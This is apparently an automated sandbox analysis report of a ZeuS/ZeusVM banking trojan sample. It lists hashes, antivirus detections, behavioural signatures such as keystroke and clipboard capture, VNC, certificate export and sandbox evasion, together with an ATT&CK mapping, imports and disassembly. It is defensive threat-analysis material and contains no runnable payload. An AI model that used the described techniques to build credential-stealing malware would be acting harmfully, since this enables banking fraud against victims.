Create Interactive Tour

Analysis Report ZeuS.exe

Overview

General Information

Sample Name:	ZeuS.exe
Analysis ID:	349874
MD5:	e77a6d08421977ee157a02f2e7590b99
SHA1:	0787ba39c8dd45cb189ce824abfd6fc9faa3d947
SHA256:	b37d9a1f83fd7ff965d3187b451ad5669f56b9c39aa6e40cbd841ef0eac7b4d8
Most interesting Screenshot:

Detection

ZeusVM

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected ZeusVM e-Banking Trojan

Multi AV Scanner detection for submitted file

Contains VNC / remote desktop functionality (version string found)

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Antivirus or Machine Learning detection for unpacked file

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

May initialize a security null descriptor

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

ZeuS.exe (PID: 6624 cmdline: 'C:\Users\user\Desktop\ZeuS.exe' MD5: E77A6D08421977EE157A02F2E7590B99)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

• AV Detection
• Cryptography
• Compliance
• Spreading
• Networking
• Key, Mouse, Clipboard, Microphone and Screen Capturing
• E-Banking Fraud
• Protection of GUI
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Lowering of HIPS / PFW / Operating System Security Settings
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: ZeuS.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: ZeuS.exe	Virustotal: Detection: 95%			Perma Link
Source: ZeuS.exe	ReversingLabs: Detection: 97%

Machine Learning detection for sample

Show sources

Source: ZeuS.exe

Joe Sandbox ML: detected

Source: 0.0.ZeuS.exe.400000.0.unpack	Avira: Label: TR/Spy.A.5678
Source: 0.2.ZeuS.exe.400000.0.unpack	Avira: Label: TR/Spy.Zbot.619281

Cryptography:

Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_0040648B CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,		0_2_0040648B
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_004130AB CryptUnprotectData,LocalFree,		0_2_004130AB

Compliance:

Uses 32bit PE files

Show sources

Source: ZeuS.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Spreading:

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_0040C874 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,

0_2_0040C874

Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_0040A860 FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0040A860
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_0040A91B FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_0040A91B

Networking:

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_00416C62 InternetReadFile,

0_2_00416C62

Source: ZeuS.exe	String found in binary or memory: http://www.google.com/webhp
Source: ZeuS.exe	String found in binary or memory: http://www.google.com/webhpbcSeShutdownPrivilegesocksvncGlobal

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_0040E072 GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,

0_2_0040E072

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_00404D51 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,

0_2_00404D51

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan

Show sources

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_00419904 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,

0_2_00419904

Protection of GUI:

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_0040B9A6 OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,

0_2_0040B9A6

System Summary:

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_00406B08 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

0_2_00406B08

Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_0041907D InitiateSystemShutdownExW,ExitWindowsEx,		0_2_0041907D
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_0041D16A CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,		0_2_0041D16A

Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_0041B567	0_2_0041B567
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_004016C3	0_2_004016C3
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_00407F39	0_2_00407F39
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_00406397	0_2_00406397

Source: ZeuS.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: classification engine

Classification label: mal76.bank.troj.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_0040D15A CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,		0_2_0040D15A
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_0040CFE5 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,		0_2_0040CFE5

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_004068B2 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

0_2_004068B2

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_0040685B CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,

0_2_0040685B

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_00412E07 CoCreateInstance,

0_2_00412E07

Source: ZeuS.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ZeuS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ZeuS.exe	Virustotal: Detection: 95%
Source: ZeuS.exe	ReversingLabs: Detection: 97%

Data Obfuscation:

Source: C:\Users\user\Desktop\ZeuS.exe

0_2_0040C874

Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_00402019 push cs; iretd	0_2_00402028
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_0040194D push es; iretd	0_2_0040195C
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_00402F3A push ds; retf	0_2_00402FEA
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_00402FDA push ds; retf	0_2_00402FEA
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_00401FE3 push cs; ret	0_2_00401FF8
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_00403FF9 pushfd ; retf	0_2_00404003

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_0040E31C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_0040E31C

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\Desktop\ZeuS.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_0-13161
Source: C:\Users\user\Desktop\ZeuS.exe	Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess			graph_0-13161

Source: C:\Users\user\Desktop\ZeuS.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_0-12540
Source: C:\Users\user\Desktop\ZeuS.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_0-12540

Source: C:\Users\user\Desktop\ZeuS.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-12739

Source: C:\Users\user\Desktop\ZeuS.exe

API coverage: 2.3 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_0040A860 FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		0_2_0040A860
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_0040A91B FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		0_2_0040A91B

Anti Debugging:

Source: C:\Users\user\Desktop\ZeuS.exe

0_2_0040C874

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_0041C1F6 mov edx, dword ptr fs:[00000030h]

0_2_0041C1F6

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_0041C53B GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,

0_2_0041C53B

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_004087D5 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

0_2_004087D5

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_00412174 InternetCrackUrlA,GetSystemTime,GetLocalTime,EnterCriticalSection,LeaveCriticalSection,

0_2_00412174

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_00417DDC GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,

0_2_00417DDC

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_00405310 GetTimeZoneInformation,

0_2_00405310

Source: C:\Users\user\Desktop\ZeuS.exe

Code function: 0_2_0041C007 GetVersionExW,GetNativeSystemInfo,

0_2_0041C007

Lowering of HIPS / PFW / Operating System Security Settings:

Source: ZeuS.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: ZeuS.exe	String found in binary or memory: RFB 003.003
Source: ZeuS.exe	String found in binary or memory: RFB 003.003
Source: ZeuS.exe, 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: -v.tmphttp://www.google.com/webhpbcSeShutdownPrivilegesocksvncGlobal\%08X%08X%08XRFB 003.003
Source: ZeuS.exe	String found in binary or memory: RFB 003.003
Source: ZeuS.exe	String found in binary or memory: -v.tmphttp://www.google.com/webhpbcSeShutdownPrivilegesocksvncGlobal\%08X%08X%08XRFB 003.003

Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_00408606 socket,bind,closesocket,		0_2_00408606
Source: C:\Users\user\Desktop\ZeuS.exe	Code function: 0_2_00408328 socket,bind,listen,closesocket,		0_2_00408328

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Native API13	Create Account1	Valid Accounts1	Valid Accounts1	Input Capture11	Network Share Discovery1	Remote Desktop Protocol1	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Valid Accounts1	Access Token Manipulation11	Access Token Manipulation11	LSASS Memory	System Time Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Remote Access Software1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Application Shimming1	Application Shimming1	Obfuscated Files or Information1	Security Account Manager	Security Software Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Install Root Certificate1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ZeuS.exe	96%	Virustotal		Browse
ZeuS.exe	98%	ReversingLabs	Win32.Trojan.Zeus
ZeuS.exe	100%	Avira	TR/Spy.A.5678
ZeuS.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.ZeuS.exe.400000.0.unpack	100%	Avira	TR/Spy.A.5678		Download File
0.2.ZeuS.exe.400000.0.unpack	100%	Avira	TR/Spy.Zbot.619281		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	349874
Start date:	08.02.2021
Start time:	12:06:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ZeuS.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.bank.troj.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 91.5%) Quality average: 81.5% Quality standard deviation: 30.5%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	MS-DOS executable
Entropy (8bit):	6.700204512671534
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% DOS Executable Borland Pascal 7.0x (2037/25) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	ZeuS.exe
File size:	141312
MD5:	e77a6d08421977ee157a02f2e7590b99
SHA1:	0787ba39c8dd45cb189ce824abfd6fc9faa3d947
SHA256:	b37d9a1f83fd7ff965d3187b451ad5669f56b9c39aa6e40cbd841ef0eac7b4d8
SHA512:	775dd98123b62a9a908bf7a40c9e0c5a39e2e7685ce462109e82feb31f8ea24e162a9ee553a93e119e34701aabf90bbe47bbf0f154fa8477a010af4851b48c90
SSDEEP:	3072:/caqyte6tV77snHLLxtUyaXOqdPNbnhW4IxZx5kCZuubFrhU1wKKrONmo:/caBt777snHRXY7PNNW4IxZ7zbC0rONx
File Content Preview:	MZ......................................................................................................................................................................................................................PE..L......M.....................:.....

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x41d470
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x4DA70DA0 [Thu Apr 14 15:07:12 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	1c2489367a741a394ef5f46c06397c1b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ecx, ecx
xor bl, bl
call 00007FDE64725E30h
test al, al
je 00007FDE64726E4Ah
push 00008007h
mov byte ptr [ebp-10h], bl
mov byte ptr [ebp-0Ch], 00000001h
mov byte ptr [ebp-01h], bl
call dword ptr [004011A0h]
lea eax, dword ptr [ebp-08h]
push eax
call dword ptr [0040119Ch]
push eax
call dword ptr [004012CCh]
test eax, eax
je 00007FDE64726DF7h
xor edx, edx
cmp dword ptr [ebp-08h], edx
jle 00007FDE64726DB1h
mov ecx, dword ptr [eax+edx*4]
test ecx, ecx
je 00007FDE64726DA4h
cmp word ptr [ecx], 002Dh
jne 00007FDE64726D9Eh
movzx ecx, word ptr [ecx+02h]
cmp ecx, 66h
je 00007FDE64726D91h
cmp ecx, 69h
je 00007FDE64726D88h
cmp ecx, 6Eh
je 00007FDE64726D7Dh
cmp ecx, 76h
jne 00007FDE64726D86h
mov byte ptr [ebp-01h], 00000001h
jmp 00007FDE64726D80h
mov byte ptr [ebp-0Ch], 00000000h
jmp 00007FDE64726D7Ah
mov bl, 01h
jmp 00007FDE64726D76h
mov byte ptr [ebp-10h], 00000001h
inc edx
cmp edx, dword ptr [ebp-08h]
jl 00007FDE64726D33h
push eax
call dword ptr [00401114h]
test bl, bl
je 00007FDE64726D79h
call 00007FDE647267E4h
jmp 00007FDE64726DA6h
cmp byte ptr [ebp-01h], 00000000h
je 00007FDE64726D95h
call 00007FDE64716FA8h
call 00007FDE64721219h
test byte ptr [004239B0h], 00000004h
mov bl, al
je 00007FDE64726D8Dh
push 00000000h
mov eax, 00423238h
call 00007FDE64716E05h
jmp 00007FDE64726D7Fh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f6a4	0x118	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25000	0x11a4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x5a0	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20584	0x20600	False	0.642932553089	data	6.72226048935	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x2054	0x400	False	0.2138671875	data	1.63599053271	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0x25000	0x166a	0x1800	False	0.625813802083	data	5.63870259283	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	VirtualAllocEx, FindClose, LoadLibraryA, RemoveDirectoryW, WaitForMultipleObjects, lstrcmpiW, FindNextFileW, VirtualProtect, GetFileTime, ReleaseMutex, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, LocalFree, GetSystemTime, WriteProcessMemory, SetFileAttributesW, CreateThread, ExpandEnvironmentStringsW, GetCurrentThreadId, ExitProcess, SetEvent, lstrcmpiA, WTSGetActiveConsoleSessionId, CreateEventW, MapViewOfFile, WriteFile, SetThreadPriority, VirtualProtectEx, TlsAlloc, TlsFree, GetFileAttributesExW, GetPrivateProfileStringW, GetPrivateProfileIntW, GetLocalTime, ResetEvent, TlsGetValue, TlsSetValue, TerminateProcess, MoveFileExW, GetModuleFileNameW, GetUserDefaultUILanguage, GetThreadContext, SetThreadContext, GetProcessId, GetNativeSystemInfo, GetVersionExW, GetCommandLineW, SetErrorMode, GetComputerNameW, OpenEventW, DuplicateHandle, GetCurrentProcessId, VirtualQueryEx, SetFileTime, VirtualAlloc, GetProcAddress, SetLastError, GetLastError, OpenMutexW, GetFileSizeEx, GetTempPathW, FlushFileBuffers, MultiByteToWideChar, IsBadReadPtr, GetProcessHeap, CreateFileW, GetTimeZoneInformation, ReadFile, Thread32Next, GetFileAttributesW, HeapCreate, HeapDestroy, ReadProcessMemory, Sleep, LoadLibraryW, WideCharToMultiByte, CreateFileMappingW, Thread32First, VirtualFree, GetCurrentThread, GetModuleHandleW, CreateDirectoryW, HeapFree, SetFilePointerEx, SystemTimeToFileTime, HeapAlloc, CreateProcessW, FreeLibrary, SetEndOfFile, FindFirstFileW, CreateMutexW, HeapReAlloc, GetTempFileNameW, FileTimeToDosDateTime, GetEnvironmentVariableW, CloseHandle, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualFreeEx, OpenProcess, CreateRemoteThread, WaitForSingleObject, EnterCriticalSection, GlobalUnlock, LeaveCriticalSection, InitializeCriticalSection, GetTickCount, UnmapViewOfFile, GlobalLock
USER32.dll	OpenInputDesktop, MenuItemFromPoint, GetMenu, RegisterClassExW, GetMenuItemRect, TrackPopupMenuEx, SystemParametersInfoW, GetClassNameW, GetMenuState, DefWindowProcA, DefMDIChildProcW, SwitchDesktop, GetMenuItemCount, DefDlgProcA, PostThreadMessageW, DefMDIChildProcA, HiliteMenuItem, DefFrameProcA, SendMessageW, CallWindowProcA, EndMenu, CallWindowProcW, DefWindowProcW, DefFrameProcW, GetWindowThreadProcessId, GetMessageW, GetShellWindow, CharLowerW, CreateDesktopW, SetProcessWindowStation, GetThreadDesktop, GetSystemMetrics, MapVirtualKeyW, GetUpdateRgn, CharLowerBuffA, ExitWindowsEx, FillRect, DrawEdge, IntersectRect, EqualRect, PrintWindow, GetWindowRect, PostMessageW, GetParent, GetWindowInfo, GetClassLongW, GetAncestor, SetWindowPos, IsWindow, MapWindowPoints, IsRectEmpty, DrawIcon, GetIconInfo, EndPaint, GetWindowDC, SetCapture, GetSubMenu, BeginPaint, GetMessageA, RegisterClassW, GetUpdateRect, DefDlgProcW, SetCursorPos, GetDCEx, ToUnicode, GetClipboardData, PeekMessageA, GetCursorPos, ReleaseCapture, GetMessagePos, CloseWindowStation, CreateWindowStationW, GetProcessWindowStation, OpenDesktopW, CloseDesktop, SetThreadDesktop, GetUserObjectInformationW, OpenWindowStationW, GetTopWindow, LoadImageW, MsgWaitForMultipleObjects, WindowFromPoint, CharToOemW, GetDC, GetWindowLongW, CharLowerA, RegisterClassExA, RegisterWindowMessageW, GetMenuItemID, SetKeyboardState, RegisterClassA, GetKeyboardState, TranslateMessage, DispatchMessageW, GetWindow, SendMessageTimeoutW, SetWindowLongW, CharUpperW, ReleaseDC, PeekMessageW, GetCapture
ADVAPI32.dll	GetLengthSid, CryptGetHashParam, OpenProcessToken, GetSidSubAuthority, CryptAcquireContextW, OpenThreadToken, GetSidSubAuthorityCount, GetTokenInformation, RegCreateKeyExW, CryptReleaseContext, RegQueryValueExW, CreateProcessAsUserW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetNamedSecurityInfoW, LookupPrivilegeValueW, CryptCreateHash, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegOpenKeyExW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, RegCloseKey, RegSetValueExW, CryptHashData, EqualSid, RegEnumKeyExW, InitiateSystemShutdownExW, ConvertSidToStringSidW, IsWellKnownSid
SHLWAPI.dll	wvnsprintfW, PathQuoteSpacesW, PathIsURLW, PathRenameExtensionW, StrStrIW, StrStrIA, StrCmpNIW, wvnsprintfA, StrCmpNIA, PathMatchSpecW, PathRemoveBackslashW, PathUnquoteSpacesW, PathAddExtensionW, PathCombineW, SHDeleteKeyW, PathSkipRootW, SHDeleteValueW, PathAddBackslashW, PathRemoveFileSpecW, PathFindFileNameW, PathIsDirectoryW, UrlUnescapeA
SHELL32.dll	ShellExecuteW, SHGetFolderPathW, CommandLineToArgvW
Secur32.dll	GetUserNameExW
ole32.dll	StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
GDI32.dll	RestoreDC, SaveDC, DeleteDC, GdiFlush, SetViewportOrgEx, SelectObject, CreateCompatibleDC, CreateDIBSection, GetDeviceCaps, GetDIBits, DeleteObject, SetRectRgn, CreateCompatibleBitmap
